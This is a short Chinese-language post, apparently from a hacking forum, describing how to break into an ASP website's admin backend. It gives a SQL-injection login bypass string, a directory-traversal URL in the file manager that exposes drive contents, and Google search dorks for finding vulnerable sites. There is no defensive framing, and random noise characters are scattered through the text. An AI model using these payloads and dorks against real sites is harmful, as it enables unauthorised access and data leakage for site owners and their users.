后台万能密码 'or'='or'
6 I V' v/ ^8 J' [" g( w- Q) K3 h" M
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!( N* W/ k$ ~& ^5 E' t
admin/uploadfile.asp?currentFolder=/upfiles/../( M' Z" [9 F' M) t, c* R
5 W6 b% W; b/ C3 p漏洞证明:6 o& V% O3 D/ K- l( r$ V
1 h; c, z- t- I. u
谷歌:inurl:type.asp?id=1 新闻中心
7 T- i H/ x% w- k: h0 r或者 :inurl:download_ok.asp?
8 p5 d$ ]& y8 K! Y. ~: n: I6 `
7 L- d+ g: t0 j# K/ z6 c X4 E |